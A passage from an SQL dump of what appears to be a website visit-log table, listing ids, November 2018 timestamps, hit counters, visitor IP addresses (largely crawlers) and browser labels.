0,0,'54.36.148.201','other'),(327340,1541599388,2,2,0,0,'91.196.178.93','chrome'),(327341,1541599389,1,1,0,0,'54.36.148.238','other'),(327342,1541599416,1,1,0,0,'54.36.148.199','other'),(327343,1541599425,2,2,0,0,'91.196.178.76','firefox'),(327344,1541599460,1,1,0,0,'54.36.149.41','other'),(327345,1541599581,1,1,0,0,'46.211.10.164','chrome'),(327346,1541599925,1,1,0,0,'54.36.149.65','other'),(327347,1541600503,1,1,0,0,'91.196.177.46','firefox'),(327348,1541600663,1,1,0,0,'54.36.148.235','other'),(327349,1541600696,1,1,0,0,'157.55.39.243','other'),(327350,1541600770,1,1,0,0,'54.36.148.107','other'),(327351,1541600917,1,1,0,0,'66.249.66.157','chrome'),(327352,1541600928,1,1,0,0,'66.249.66.154','chrome'),(327353,1541601139,1,1,0,0,'54.36.148.118','other'),(327354,1541601150,1,1,0,0,'54.36.149.21','other'),(327355,1541601777,1,1,0,0,'54.36.148.70','other'),(327356,1541601811,1,1,0,0,'54.36.148.95','other'),(327357,1541602088,3,3,0,0,'216.244.66.241','other'),(327358,1541602160,2,2,0,0,'91.196.178.131','chrome'),(327359,1541602218,1,1,0,0,'95.135.211.160','firefox'),(327360,1541602383,1,1,0,0,'54.36.148.75','other'),(327361,1541602533,1,1,0,0,'54.36.148.111','other'),(327362,1541602865,1,1,0,0,'66.249.66.154','chrome'),(327363,1541602937,2,2,0,0,'91.196.178.93','chrome'),(327364,1541602994,2,2,0,0,'178.93.203.68','chrome'),(327365,1541603159,1,1,0,0,'54.36.149.32','other'),(327366,1541603191,1,1,0,0,'91.196.178.131','chrome'),(327367,1541603449,2,2,0,0,'91.196.177.46','firefox'),(327368,1541603690,1,1,0,0,'54.36.148.56','other'),(327369,1541603758,1,1,0,0,'54.36.148.231','other'),(327370,1541603912,1,1,0,0,'54.36.149.20','other'),(327371,1541603941,3,3,0,0,'95.135.211.160','firefox'),(327372,1541604390,1,1,0,0,'54.36.148.168','other'),(327373,1541604526,1,1,0,0,'54.36.148.164','other'),(327374,1541604569,1,1,0,0,'54.36.148.101','other'),(327375,1541604755,1,1,0,0,'54.36.149.84','other'),(327376,1541605022,1,1,0,0,'8.29.198.27','other'),(327377,1541605124,1,1,0,0,'46.229.168.145','other'),(327379,1541605126,1,1,0,0,'46.229.168.151','other'),(327380,1541605131,2,2,0,0,'91.196.178.77','chrome'),(327381,1541605391,1,1,0,0,'176.120.111.183','chrome'),(327382,1541605805,1,1,0,0,'54.36.148.54','other'),(327383,1541605997,1,1,0,0,'87.250.224.65','other'),(327384,1541606079,1,1,0,0,'66.249.66.157','chrome'),(327385,1541606104,1,1,0,0,'66.249.66.154','chrome'),(327386,1541606413,1,1,0,0,'87.250.224.64','other'),(327387,1541606416,1,1,0,0,'54.36.148.147','other'),(327388,1541606517,1,1,0,0,'54.36.148.237','other'),(327389,1541606578,2,2,0,0,'8.29.198.25','other'),(327390,1541606581,1,1,0,0,'5.45.207.79','other'),(327391,1541606692,1,1,0,0,'54.36.148.226','other'),(327392,1541606812,1,1,0,0,'141.8.142.103','other'),(327393,1541606843,1,1,0,0,'178.154.200.48','other'),(327394,1541606864,1,1,0,0,'95.108.213.4','other'),(327395,1541607266,1,1,0,0,'37.9.113.20','other'),(327396,1541607326,1,1,0,0,'141.8.142.144','other'),(327397,1541607521,1,1,0,0,'216.244.66.241','other'),(327398,1541607551,2,2,0,0,'66.249.66.154','chrome'),(327399,1541607624,1,1,0,0,'91.196.178.79','chrome'),(327400,1541607886,1,1,0,0,'46.229.168.132','other'),(327401,1541607916,1,1,0,0,'66.249.66.157','chrome'),(327402,1541608143,1,1,0,0,'157.55.39.243','other'),(327403,1541608169,1,1,0,0,'18.208.128.80','firefox'),(327404,1541608682,1,1,0,0,'157.55.39.152','other'),(327405,1541609023,1,1,0,0,'54.36.148.100','other'),(327406,1541609079,6,6,0,0,'216.244.66.241','other'),(327407,1541609176,1,1,0,0,'213.180.203.17','other'),(327408,1541609251,1,1,0,0,'37.9.113.20','other'),(327409,1541609406,2,2,0,0,'46.211.38.71','chrome'),(327410,1541609569,1,1,0,0,'54.36.148.78','other'),(327411,1541609725,1,1,0,0,'66.249.66.157','chrome'),(327412,1541609735,1,1,0,0,'66.249.66.152','chrome'),(327413,1541609743,1,1,0,0,'54.36.148.203','other'),(327414,1541609901,1,1,0,0,'54.36.149.12','other'),(327415,1541610176,1,1,0,0,'216.244.66.241','other'),(327416,1541610307,1,1,0,0,'130.180.212.136','other'),(327417,1541610800,1,1,0,0,'54.36.148.165','other'),(327418,1541610864,1,1,0,0,'54.36.148.151','other'),(327419,1541611177,1,1,0,0,'54.36.149.43','other'),(327420,1541611223,1,1,0,0,'39.98.61.115','other'),(327421,1541611700,2,2,0,0,'216.244.66.241','other'),(327422,1541611828,1,1,0,0,'54.36.148.23','other'),(327423,1541612020,1,1,0,0,'54.36.149.63','other'),(327424,1541612125,2,2,0,0,'91.194.238.35','chrome'),(327425,1541612278,1,1,0,0,'54.36.148.68','other'),(327426,1541612724,2,2,0,0,'195.135.247.7','chrome'),(327427,1541613051,1,1,0,0,'54.36.148.227','other'),(327428,1541613213,1,1,0,0,'54.36.148.194','other'),(327429,1541613454,1,1,0,0,'54.36.148.209','other'),(327430,1541613711,1,1,0,0,'193.106.30.98','firefox'),(327431,1541614319,1,1,0,0,'54.36.148.255','other'),(327432,1541614516,1,1,0,0,'54.36.148.147','other'),(327433,1541614811,1,1,0,0,'54.36.148.108','other'),(327434,1541614813,1,1,0,0,'54.36.149.96','other'),(327435,1541614867,3,3,0,0,'91.196.178.174','chrome'),(327436,1541614984,1,1,0,0,'178.92.72.196','chrome'),(327437,1541615148,1,1,0,0,'46.229.168.142','other'),(327438,1541615178,1,1,0,0,'54.36.148.205','other'),(327439,1541615333,1,1,0,0,'207.46.13.117','other'),(327440,1541615377,1,1,0,0,'66.249.66.156','chrome'),(327441,1541615379,1,1,0,0,'66.249.66.154','chrome'),(327442,1541615692,2,2,0,0,'46.211.122.13','chrome'),(327443,1541615701,1,1,0,0,'66.249.66.59','chrome'),(327444,1541615702,1,1,0,0,'66.249.66.44','chrome'),(327445,1541615764,1,1,0,0,'54.36.148.203','other'),(327446,1541615827,2,2,0,0,'5.165.242.21','other'),(327447,1541615881,1,1,0,0,'8.29.198.27','other'),(327448,1541615910,1,1,0,0,'54.36.148.121','other'),(327449,1541616284,1,1,0,0,'66.249.66.157','chrome'),(327450,1541616285,1,1,0,0,'66.249.66.152','chrome'),(327451,1541616369,1,1,0,0,'216.244.66.241','other'),(327452,1541616412,2,2,0,0,'157.55.39.152','other'),(327453,1541616503,1,1,0,0,'54.36.148.139','other'),(327454,1541616609,1,1,0,0,'207.46.13.117','other'),(327455,1541616729,1,1,0,0,'54.36.149.28','other'),(327456,1541616976,1,1,0,0,'54.36.148.32','other'),(327457,1541617199,1,1,0,0,'54.36.149.103','other'),(327458,1541617335,1,1,0,0,'216.244.66.241','other'),(327459,1541617340,1,1,0,0,'54.36.148.170','other'),(327460,1541617528,1,1,0,0,'54.36.149.97','other'),(327461,1541617636,1,1,0,0,'54.36.149.76','other'),(327462,1541617676,2,2,0,0,'8.29.198.27','other'),(327463,1541617854,1,1,0,0,'54.36.148.142','other'),(327464,1541618154,1,1,0,0,'54.36.148.254','other'),(327465,1541618432,1,1,0,0,'54.36.148.16','other'),(327466,1541618491,1,1,0,0,'54.36.148.183','other'),(327467,1541619262,1,1,0,0,'54.36.149.72','other'),(327468,1541619303,1,1,0,0,'54.36.148.181','other'),(327469,1541619350,1,1,0,0,'54.36.148.203','other'),(327470,1541619601,1,1,0,0,'54.36.148.202','other'),(327471,1541619631,1,1,0,0,'54.36.148.163','other'),(327472,1541619653,3,3,0,0,'216.244.66.241','other'),(327473,1541619762,1,1,0,0,'46.229.168.142','other'),(327474,1541619765,1,1,0,0,'46.229.168.139','other'),(327475,1541620128,1,1,0,0,'54.36.148.191','other'),(327476,1541620203,1,0,1,0,'66.249.66.154',''),(327477,1541620269,1,1,0,0,'54.36.149.9','other'),(327478,1541620295,1,1,0,0,'46.229.168.132','other'),(327479,1541620443,1,1,0,0,'46.188.107.78','msie'),(327480,1541620506,1,1,0,0,'54.36.148.142','other'),(327481,1541620511,1,1,0,0,'54.36.148.41','other'),(327482,1541621028,1,1,0,0,'54.36.149.30','other'),(327483,1541621474,2,2,0,0,'52.53.201.78','chrome'),(327484,1541621671,1,1,0,0,'54.36.149.73','other'),(327485,1541621712,1,1,0,0,'54.36.149.37','other'),(327486,1541621896,1,1,0,0,'54.36.149.67','other'),(327487,1541622820,1,1,0,0,'66.249.66.42','chrome'),(327488,1541622914,1,1,0,0,'207.46.13.190','other'),(327489,1541623435,1,1,0,0,'46.229.168.129','other'),(327490,1541623441,1,1,0,0,'46.229.168.135','other'),(327491,1541623708,1,1,0,0,'66.249.66.156','other'),(327492,1541623852,1,1,0,0,'207.46.13.190','other'),(327493,1541624229,1,1,0,0,'46.229.168.139','other'),(327494,1541625212,2,2,0,0,'216.244.66.241','other'),(327495,1541625380,1,1,0,0,'46.229.168.148','other'),(327496,1541625387,1,1,0,0,'46.229.168.140','other'),(327497,1541625659,1,1,0,0,'91.196.178.100','chrome'),(327498,1541625725,1,1,0,0,'87.250.224.99','other'),(327499,1541625971,1,1,0,0,'46.229.168.144','other'),(327500,1541625974,1,1,0,0,'46.229.168.134','other'),(327501,1541626219,3,3,0,0,'141.8.142.144','other'),(327502,1541626636,1,1,0,0,'178.154.171.69','other'),(327503,1541626639,1,1,0,0,'5.45.207.19','other'),(327504,1541626651,1,1,0,0,'178.154.200.48','other'),(327505,1541626735,3,3,0,0,'178.154.171.24','other'),(327506,1541626738,1,1,0,0,'141.8.142.191','other'),(327507,1541626741,1,1,0,0,'8.29.198.27','other'),(327508,1541626832,1,1,0,0,'37.9.113.103','other'),(327509,1541627043,1,1,0,0,'141.8.142.103','other'),(327510,1541627288,2,2,0,0,'5.45.207.8','other'),(327511,1541627307,5,5,0,0,'216.244.66.241','other'),(327512,1541627364,1,1,0,0,'87.250.224.99','other'),(327513,1541627452,1,1,0,0,'66.249.66.156','chrome'),(327514,1541627522,1,1,0,0,'66.249.66.154','chrome'),(327515,1541627754,1,1,0,0,'141.8.142.65','other'),(327516,1541628056,1,1,0,0,'46.229.168.133','other'),(327517,1541628210,1,1,0,0,'91.196.177.69','chrome'),(327518,1541628596,1,1,0,0,'8.29.198.25','other'),(327519,1541628615,1,1,0,0,'95.163.255.99','other'),(327520,1541628618,1,1,0,0,'95.163.255.98','other'),(327521,1541628828,1,1,0,0,'8.29.198.27','other'),(327522,1541628943,1,1,0,0,'46.229.168.141','other'),(327523,1541629418,1,1,0,0,'46.229.168.134','other'),(327524,1541629420,1,1,0,0,'46.229.168.135','other'),(327525,1541629827,2,2,0,0,'163.172.78.154','firefox'),(327526,1541629903,1,1,0,0,'46.229.168.147','other'),(327527,1541630114,1,1,0,0,'66.249.66.61','chrome'),(327528,1541630370,1,1,0,0,'66.249.66.59','chrome'),(327529,1541630376,1,1,0,0,'66.249.66.42','chrome'),(327530,1541630381,1,1,0,0,'66.249.66.40','chrome'),(327531,1541630451,1,1,0,0,'216.244.66.241','other'),(327532,1541631212,1,1,0,0,'66.249.66.61','chrome'),(327533,1541631215,1,1,0,0,'66.249.66.44','chrome'),(327534,1541631750,1,1,0,0,'46.229.168.130','other'),(327535,1541631754,1,1,0,0,'46.229.168.140','other'),(327536,1541631957,1,1,0,0,'5.58.101.250','msie'),(327537,1541632178,1,1,0,0,'46.229.168.138','other'),(327538,1541632676,3,3,0,0,'216.244.66.241','other'),(327539,1541633789,1,1,0,0,'54.36.148.85','other'),(327540,1541633949,1,1,0,0,'54.36.148.154','other'),(327541,1541633981,1,1,0,0,'46.229.168.136','other'),(327542,1541633987,1,1,0,0,'95.108.213.4','other'),(327543,1541634016,1,1,0,0,'54.36.148.20','other'),(327544,1541634040,1,1,0,0,'54.36.149.85','other'),(327545,1541634556,1,1,0,0,'54.36.149.45','other'),(327546,1541634697,1,1,0,0,'207.46.13.190','other'),(327547,1541634701,1,1,0,0,'54.36.148.33','other'),(327548,1541634847,1,1,0,0,'54.36.149.24','other'),(327549,1541634863,1,1,0,0,'54.36.148.70','other'),(327550,1541634914,1,1,0,0,'62.205.134.182','other'),(327551,1541634954,1,1,0,0,'54.36.148.29','other'),(327552,1541635112,1,1,0,0,'54.36.149.91','other'),(327553,1541635315,1,1,0,0,'46.229.168.140','other'),(327554,1541635317,1,1,0,0,'46.229.168.152','other'),(327555,1541635347,1,1,0,0,'54.36.149.90','other'),(327556,1541635720,1,1,0,0,'54.36.148.128','other'),(327557,1541635735,1,1,0,0,'54.36.148.31','other'),(327558,1541635974,1,1,0,0,'54.36.148.188','other'),(327559,1541636038,2,2,0,0,'216.244.66.241','other'),(327560,1541636173,1,1,0,0,'54.36.148.234','other'),(327561,1541636303,1,1,0,0,'54.36.149.60','other'),(327562,1541636449,1,1,0,0,'46.229.168.143','other'),(327563,1541636451,1,1,0,0,'46.229.168.138','other'),(327564,1541636554,1,1,0,0,'54.36.148.43','other'),(327565,1541636703,1,1,0,0,'54.36.149.40','other'),(327566,1541637049,1,1,0,0,'54.36.149.37','other'),(327567,1541637136,1,1,0,0,'54.36.148.40','other'),(327568,1541637363,1,1,0,0,'54.36.149.35','other'),(327569,1541637369,1,1,0,0,'46.229.168.136','other'),(327570,1541637575,1,1,0,0,'54.36.148.107','other'),(327571,1541637609,1,1,0,0,'8.29.198.26','other'),(327572,1541637853,1,1,0,0,'207.46.13.117','other'),(327573,1541637988,1,1,0,0,'54.36.149.5','other'),(327574,1541638347,1,1,0,0,'54.36.148.25','other'),(327575,1541638380,1,1,0,0,'54.36.149.10','other'),(327576,1541638443,1,1,0,0,'54.36.148.57','other'),(327577,1541638458,1,1,0,0,'54.36.148.32','other'),(327578,1541638612,1,1,0,0,'66.249.66.59','chrome'),(327579,1541638629,1,1,0,0,'66.249.66.42','chrome'),(327580,1541638633,1,1,0,0,'46.229.168.133','other'),(327581,1541638637,1,1,0,0,'46.229.168.145','other'),(327582,1541638662,1,1,0,0,'216.244.66.241','other'),(327583,1541638789,1,1,0,0,'54.36.148.64','other'),(327584,1541638855,1,1,0,0,'54.36.148.241','other'),(327585,1541638923,1,1,0,0,'46.229.168.134','other'),(327586,1541638924,1,1,0,0,'46.229.168.151','other'),(327587,1541639049,1,1,0,0,'54.36.148.220','other'),(327589,1541639260,1,1,0,0,'54.36.149.14','other'),(327590,1541639329,1,1,0,0,'54.36.148.72','other'),(327591,1541639453,1,1,0,0,'8.29.198.25','other'),(327592,1541639692,1,1,0,0,'8.29.198.26','other'),(327593,1541639741,1,1,0,0,'54.36.149.43','other'),(327594,1541639866,1,1,0,0,'54.36.148.196','other'),(327595,1541640283,2,2,0,0,'216.244.66.241','other'),(327596,1541640361,1,1,0,0,'54.36.149.85','other'),(327597,1541640444,1,1,0,0,'54.36.149.12','other'),(327598,1541640475,1,1,0,0,'54.36.149.34','other'),(327599,1541640602,1,1,0,0,'54.36.148.219','other'),(327600,1541640930,1,1,0,0,'54.36.149.71','other'),(327601,1541641033,1,1,0,0,'54.36.148.19','other'),(327602,1541641447,1,1,0,0,'54.36.148.138','other'),(327603,1541641513,1,1,0,0,'54.36.148.20','other'),(327604,1541641572,1,1,0,0,'89.163.131.166','other'),(327605,1541641621,1,1,0,0,'54.36.149.93','other'),(327606,1541641805,1,1,0,0,'54.36.148.204','other'),(327607,1541641849,1,1,0,0,'54.36.149.102','other'),(327608,1541642228,1,1,0,0,'54.36.148.190','other'),(327609,1541642251,1,1,0,0,'54.36.148.233','other'),(327610,1541643243,1,1,0,0,'54.36.148.238','other'),(327611,1541643298,1,1,0,0,'216.244.66.241','other'),(327612,1541643600,1,1,0,0,'54.36.148.28','other'),(327613,1541643878,1,1,0,0,'54.36.148.124','other'),(327614,1541644055,1,1,0,0,'54.36.149.18','other'),(327615,1541644113,1,1,0,0,'54.36.149.24','other'),(327616,1541644210,1,1,0,0,'54.36.148.245','other'),(327617,1541644689,1,1,0,0,'54.36.148.135','other'),(327618,1541644723,6,6,0,0,'178.154.244.11','other'),(327619,1541644822,3,3,0,0,'178.154.244.29','other'),(327620,1541644942,2,2,0,0,'157.55.39.152','other'),(327621,1541645243,1,1,0,0,'54.36.149.78','other'),(327622,1541645283,1,1,0,0,'54.36.149.74','other'),(327623,1541645507,1,1,0,0,'54.36.148.180','other'),(327624,1541645746,4,4,0,0,'178.154.244.29','other'),(327625,1541645767,5,5,0,0,'178.154.244.11','other'),(327626,1541645900,3,3,0,0,'216.244.66.241','other'),(327627,1541646027,1,1,0,0,'157.55.39.243','other'),(327628,1541646357,1,1,0,0,'46.229.168.132','other'),(327629,1541646359,1,1,0,0,'46.229.168.144','other'),(327630,1541646734,1,1,0,0,'66.249.66.155','chrome'),(327631,1541646746,1,1,0,0,'66.249.66.152','chrome'),(327632,1541646770,1,1,0,0,'54.36.148.54','other'),(327633,1541646934,1,1,0,0,'54.36.148.235','other'),(327634,1541646956,1,1,0,0,'54.36.148.178','other'),(327635,1541647157,2,2,0,0,'95.163.255.92','other'),(327636,1541647179,1,1,0,0,'54.36.148.31','other'),(327637,1541647447,1,1,0,0,'54.36.148.248','other'),(327638,1541647667,1,1,0,0,'46.229.168.143','other'),(327639,1541647669,1,1,0,0,'46.229.168.145','other'),(327640,1541648463,1,1,0,0,'8.29.198.26','other'),(327641,1541648773,4,4,0,0,'216.244.66.241','other'),(327642,1541649067,1,1,0,0,'54.36.149.27','other'),(327643,1541649282,1,1,0,0,'66.249.66.155','chrome'),(327644,1541649291,3,3,0,0,'66.249.66.154','chrome'),(327645,1541649347,2,2,0,0,'66.249.66.157','chrome'),(327647,1541649415,1,1,0,0,'54.36.149.66','other'),(327648,1541649497,1,1,0,0,'66.249.66.156','chrome'),(327649,1541649592,1,1,0,0,'54.36.148.203','other'),(327650,1541649637,1,1,0,0,'207.46.13.190','other'),(327651,1541649690,2,2,0,0,'54.36.148.225','other'),(327652,1541649863,2,2,0,0,'66.249.66.152','chrome'),(327653,1541649920,1,1,0,0,'66.249.66.57','chrome'),(327654,1541649966,1,1,0,0,'66.249.66.44','chrome'),(327655,1541650222,1,1,0,0,'66.249.66.155','chrome'),(327656,1541650265,1,1,0,0,'54.36.148.199','other'),(327657,1541650303,2,2,0,0,'8.29.198.25','other'),(327658,1541650621,1,1,0,0,'66.249.66.156','chrome'),(327659,1541650642,1,1,0,0,'66.249.66.154','chrome'),(327660,1541650789,1,1,0,0,'54.36.148.174','other'),(327661,1541651076,1,1,0,0,'54.36.148.138','other'),(327662,1541651241,1,1,0,0,'54.36.148.56','other'),(327663,1541651502,1,1,0,0,'216.244.66.241','other'),(327664,1541651632,1,1,0,0,'66.249.66.154','chrome'),(327665,1541651687,1,1,0,0,'66.249.66.156','chrome'),(327666,1541651702,1,1,0,0,'66.249.66.152','chrome'),(327667,1541651751,2,2,0,0,'54.36.148.111','other'),(327668,1541652361,1,1,0,0,'54.36.148.144','other'),(327669,1541652503,1,1,0,0,'54.36.149.31','other'),(327670,1541653441,1,1,0,0,'66.249.66.156','chrome'),(327671,1541653469,1,1,0,0,'66.249.66.154','chrome'),(327672,1541653527,1,1,0,0,'54.36.149.94','other'),(327673,1541653721,1,1,0,0,'54.36.148.181','other'),(327674,1541653734,1,1,0,0,'180.76.15.31','other'),(327675,1541653735,1,1,0,0,'180.76.15.10','other'),(327676,1541653796,1,1,0,0,'95.132.63.186','chrome'),(327677,1541653944,1,1,0,0,'54.36.148.104','other'),(327678,1541654237,1,1,0,0,'54.36.148.102','other'),(327679,1541654432,1,1,0,0,'46.229.168.134','other'),(327680,1541654435,1,1,0,0,'46.229.168.150','other'),(327681,1541654505,1,1,0,0,'54.36.148.170','other'),(327682,1541654572,1,1,0,0,'54.36.149.92','other'),(327683,1541654785,1,1,0,0,'66.249.66.152','other'),(327684,1541654958,1,1,0,0,'54.36.148.226','other'),(327685,1541655132,1,1,0,0,'66.249.66.154','other'),(327686,1541655247,1,1,0,0,'54.36.149.107','other'),(327687,1541655312,1,1,0,0,'157.55.39.243','other'),(327688,1541655459,1,1,0,0,'66.249.66.156','chrome'),(327689,1541655562,1,1,0,0,'54.36.149.5','other'),(327690,1541655638,1,1,0,0,'54.36.149.63','other'),(327691,1541655708,1,1,0,0,'54.36.148.54','other'),(327692,1541655793,1,1,0,0,'54.36.148.119','other'),(327693,1541655845,1,1,0,0,'54.36.148.173','other'),(327694,1541655854,1,0,1,0,'66.249.66.44',''),(327695,1541656310,2,2,0,0,'216.244.66.241','other'),(327696,1541656462,1,1,0,0,'66.249.66.156','chrome'),(327697,1541656493,1,1,0,0,'66.249.66.154','chrome'),(327698,1541656532,1,1,0,0,'54.36.149.68','other'),(327699,1541656732,1,1,0,0,'54.36.148.50','other'),(327700,1541656849,1,0,1,0,'66.249.66.44',''),(327701,1541657037,1,1,0,0,'95.163.255.98','other'),(327702,1541657040,2,2,0,0,'95.163.255.96','other'),(327703,1541657079,1,1,0,0,'95.163.255.94','other'),(327704,1541657217,1,1,0,0,'54.36.148.186','other'),(327705,1541657226,1,1,0,0,'54.36.149.29','other'),(327706,1541657362,1,1,0,0,'54.36.148.175','other'),(327707,1541657979,1,1,0,0,'46.229.168.149','other'),(327708,1541657982,1,1,0,0,'46.229.168.140','other'),(327709,1541658154,2,2,0,0,'66.249.66.155','chrome'),(327710,1541658168,2,2,0,0,'66.249.66.154','chrome'),(327711,1541658338,1,1,0,0,'54.36.148.169','other'),(327712,1541658386,1,1,0,0,'66.249.66.156','chrome'),(327713,1541658533,1,1,0,0,'54.36.148.250','other'),(327714,1541658688,1,1,0,0,'54.36.148.177','other'),(327715,1541658776,1,1,0,0,'54.36.148.59','other'),(327716,1541658849,1,1,0,0,'54.36.148.23','other'),(327717,1541658859,1,1,0,0,'66.249.66.44','chrome'),(327718,1541658899,1,1,0,0,'54.36.148.159','other'),(327719,1541658947,1,1,0,0,'157.55.39.243','other'),(327720,1541659053,1,1,0,0,'37.52.165.145','chrome'),(327721,1541659220,1,1,0,0,'54.36.149.99','other'),(327722,1541659321,1,1,0,0,'8.29.198.25','other'),(327723,1541659632,1,1,0,0,'54.36.148.213','other'),(327724,1541659775,14,14,0,0,'66.249.66.155','chrome'),(327725,1541659776,4,3,1,0,'66.249.66.154',''),(327726,1541659821,3,3,0,0,'66.249.66.157','chrome'),(327727,1541659822,6,6,0,0,'66.249.66.156','chrome'),(327728,1541659872,4,4,0,0,'216.244.66.241','other'),(327729,1541659881,16,16,0,0,'66.249.66.152','chrome'),(327730,1541659897,1,1,0,0,'54.36.148.193','other'),(327731,1541660225,1,0,1,0,'66.249.66.59',''),(327732,1541660228,1,0,1,0,'66.249.66.44',''),(327733,1541660388,2,2,0,0,'94.178.109.103','firefox'),(327734,1541660695,2,2,0,0,'91.196.178.93','chrome'),(327735,1541660801,2,2,0,0,'157.55.39.243','other'),(327736,1541660804,1,1,0,0,'207.46.13.117','other'),(327737,1541660899,1,1,0,0,'37.53.156.3','chrome'),(327738,1541661156,1,1,0,0,'8.29.198.25','other'),(327739,1541661393,1,1,0,0,'54.36.148.103','other'),(327740,1541661425,1,1,0,0,'8.29.198.26','other'),(327741,1541661826,2,2,0,0,'216.244.66.241','other'),(327742,1541661937,1,1,0,0,'54.36.148.160','other'),(327743,1541662687,1,1,0,0,'54.36.148.82','other'),(327744,1541662757,1,1,0,0,'157.55.39.243','other'),(327745,1541663187,1,1,0,0,'66.249.66.156','chrome'),(327746,1541663205,3,3,0,0,'66.249.66.152','chrome'),(327747,1541663253,1,1,0,0,'54.36.148.197','other'),(327748,1541663266,1,1,0,0,'66.102.9.134','chrome'),(327749,1541663268,1,1,0,0,'66.102.9.154','chrome'),(327750,1541663522,2,2,0,0,'91.196.178.93','chrome'),(327751,1541663724,1,1,0,0,'207.46.13.117','other'),(327752,1541663749,1,1,0,0,'66.249.66.155','chrome'),(327753,1541663761,1,1,0,0,'66.249.66.157','chrome'),(327754,1541663813,1,1,0,0,'54.36.148.64','other'),(327755,1541663910,1,1,0,0,'54.36.149.71','other'),(327756,1541663944,1,1,0,0,'54.36.148.245','other'),(327757,1541664556,1,1,0,0,'54.36.149.60','other'),(327758,1541664626,2,2,0,0,'66.249.66.156','chrome'),(327759,1541664777,2,2,0,0,'91.196.178.93','chrome'),(327760,1541664856,1,1,0,0,'66.249.66.155','chrome'),(327761,1541664867,1,1,0,0,'66.249.66.154','chrome'),(327762,1541665031,1,1,0,0,'66.249.66.152','chrome'),(327763,1541665147,1,1,0,0,'54.36.148.211','other'),(327764,1541665681,1,1,0,0,'54.36.148.27','other'),(327765,1541665947,1,1,0,0,'54.36.148.206','other'),(327766,1541666031,1,1,0,0,'77.111.247.105','chrome'),(327767,1541666155,1,1,0,0,'54.36.148.22','other'),(327768,1541666218,1,1,0,0,'178.154.244.29','other'),(327769,1541666226,3,3,0,0,'37.52.18.177','firefox'),(327770,1541666270,1,1,0,0,'178.154.244.11','other'),(327771,1541666313,2,2,0,0,'91.196.178.93','chrome'),(327772,1541666387,1,1,0,0,'54.36.148.175','other'),(327773,1541666414,1,1,0,0,'54.36.149.47','other'),(327774,1541666499,1,1,0,0,'157.55.39.152','other'),(327775,1541666647,1,1,0,0,'54.36.149.26','other'),(327776,1541666698,1,1,0,0,'54.36.148.172','other'),(327777,1541666704,1,1,0,0,'54.36.148.191','other'),(327778,1541666712,1,1,0,0,'54.36.149.65','other'),(327779,1541666904,2,2,0,0,'66.249.66.152','chrome'),(327780,1541667223,2,2,0,0,'66.249.66.154','chrome'),(327781,1541667248,5,5,0,0,'216.244.66.241','other'),(327782,1541667432,1,1,0,0,'54.36.148.242','other'),(327783,1541667897,1,1,0,0,'54.36.148.76','other'),(327784,1541668285,16,16,0,0,'114.215.154.125','other'),(327785,1541668443,2,2,0,0,'91.196.178.93','chrome'),(327786,1541668581,2,2,0,0,'91.196.178.169','chrome'),(327787,1541668725,1,1,0,0,'54.36.149.3','other'),(327788,1541668736,1,1,0,0,'54.36.148.56','other'),(327789,1541669122,1,1,0,0,'54.36.148.18','other'),(327790,1541669348,1,1,0,0,'54.36.148.51','other'),(327791,1541669413,1,1,0,0,'54.36.148.243','other'),(327792,1541669447,1,1,0,0,'54.36.148.188','other'),(327793,1541669462,1,1,0,0,'54.36.149.106','other'),(327794,1541669517,1,1,0,0,'54.36.148.118','other'),(327795,1541669524,1,1,0,0,'54.36.148.178','other'),(327796,1541669552,1,1,0,0,'66.249.66.155','chrome'),(327797,1541669574,1,1,0,0,'66.249.66.152','chrome'),(327798,1541669691,2,2,0,0,'216.244.66.241','other'),(327799,1541669758,2,2,0,0,'213.174.23.22','chrome'),(327800,1541669825,1,1,0,0,'54.36.149.21','other'),(327801,1541669964,1,1,0,0,'66.249.66.156','chrome'),(327802,1541669985,1,1,0,0,'54.36.149.3','other'),(327803,1541669994,1,1,0,0,'54.36.148.54','other'),(327804,1541670045,1,1,0,0,'46.229.168.136','other'),(327805,1541670047,1,1,0,0,'46.229.168.140','other'),(327806,1541670138,4,4,0,0,'37.52.21.244','chrome'),(327807,1541670165,2,2,0,0,'94.153.168.82','firefox'),(327808,1541670194,1,1,0,0,'8.29.198.27','other'),(327809,1541670579,2,2,0,0,'91.196.178.93','chrome'),(327810,1541670696,1,1,0,0,'46.229.168.138','other'),(327811,1541670959,2,2,0,0,'91.124.45.178','chrome'),(327812,1541671237,1,1,0,0,'54.36.148.129','other'),(327813,1541671563,1,1,0,0,'54.36.148.219','other'),(327814,1541671748,1,1,0,0,'91.196.178.93','chrome'),(327815,1541671805,1,1,0,0,'54.36.148.37','other'),(327816,1541671999,1,1,0,0,'8.29.198.27','other'),(327817,1541672044,4,4,0,0,'216.244.66.241','other'),(327818,1541672283,1,1,0,0,'8.29.198.25','other'),(327819,1541672331,1,1,0,0,'54.36.148.237','other'),(327820,1541673633,1,1,0,0,'207.46.13.190','other'),(327821,1541674599,1,1,0,0,'67.231.16.205','other'),(327822,1541674609,1,1,0,0,'54.36.149.44','other'),(327823,1541674751,1,1,0,0,'91.196.178.93','firefox'),(327824,1541674924,1,1,0,0,'54.36.149.81','other'),(327825,1541674969,4,4,0,0,'37.52.21.244','chrome'),(327826,1541675128,2,2,0,0,'91.196.178.93','chrome'),(327827,1541675217,2,2,0,0,'91.196.178.104','chrome'),(327828,1541675228,1,1,0,0,'54.36.148.170','other'),(327829,1541675604,1,1,0,0,'54.36.148.227','other'),(327830,1541675659,1,1,0,0,'66.249.66.157','chrome'),(327832,1541675975,1,1,0,0,'54.36.148.182','other'),(327833,1541676021,1,1,0,0,'54.165.59.7','other'),(327834,1541676120,2,2,0,0,'94.153.168.82','firefox'),(327835,1541676168,1,1,0,0,'46.229.168.133','other'),(327836,1541676195,1,1,0,0,'66.249.66.154','chrome'),(327837,1541676205,1,1,0,0,'54.36.148.252','other'),(327838,1541676484,1,1,0,0,'54.36.148.72','other'),(327839,1541676643,2,2,0,0,'141.8.142.108','other'),(327840,1541676676,1,1,0,0,'46.229.168.134','other'),(327841,1541676729,2,2,0,0,'130.180.219.76','chrome'),(327842,1541676815,4,4,0,0,'178.154.244.11','other'),(327843,1541676887,1,1,0,0,'54.36.149.53','other'),(327844,1541677084,1,1,0,0,'54.36.148.157','other'),(327845,1541677243,2,2,0,0,'5.45.207.19','other'),(327846,1541677268,1,1,0,0,'54.36.148.12','other'),(327847,1541677276,1,1,0,0,'37.9.113.103','other'),(327848,1541677309,4,4,0,0,'216.244.66.241','other'),(327849,1541677326,3,3,0,0,'5.45.207.79','other'),(327850,1541677335,1,1,0,0,'54.36.148.236','other'),(327851,1541677399,1,1,0,0,'87.250.224.47','other'),(327852,1541677503,1,1,0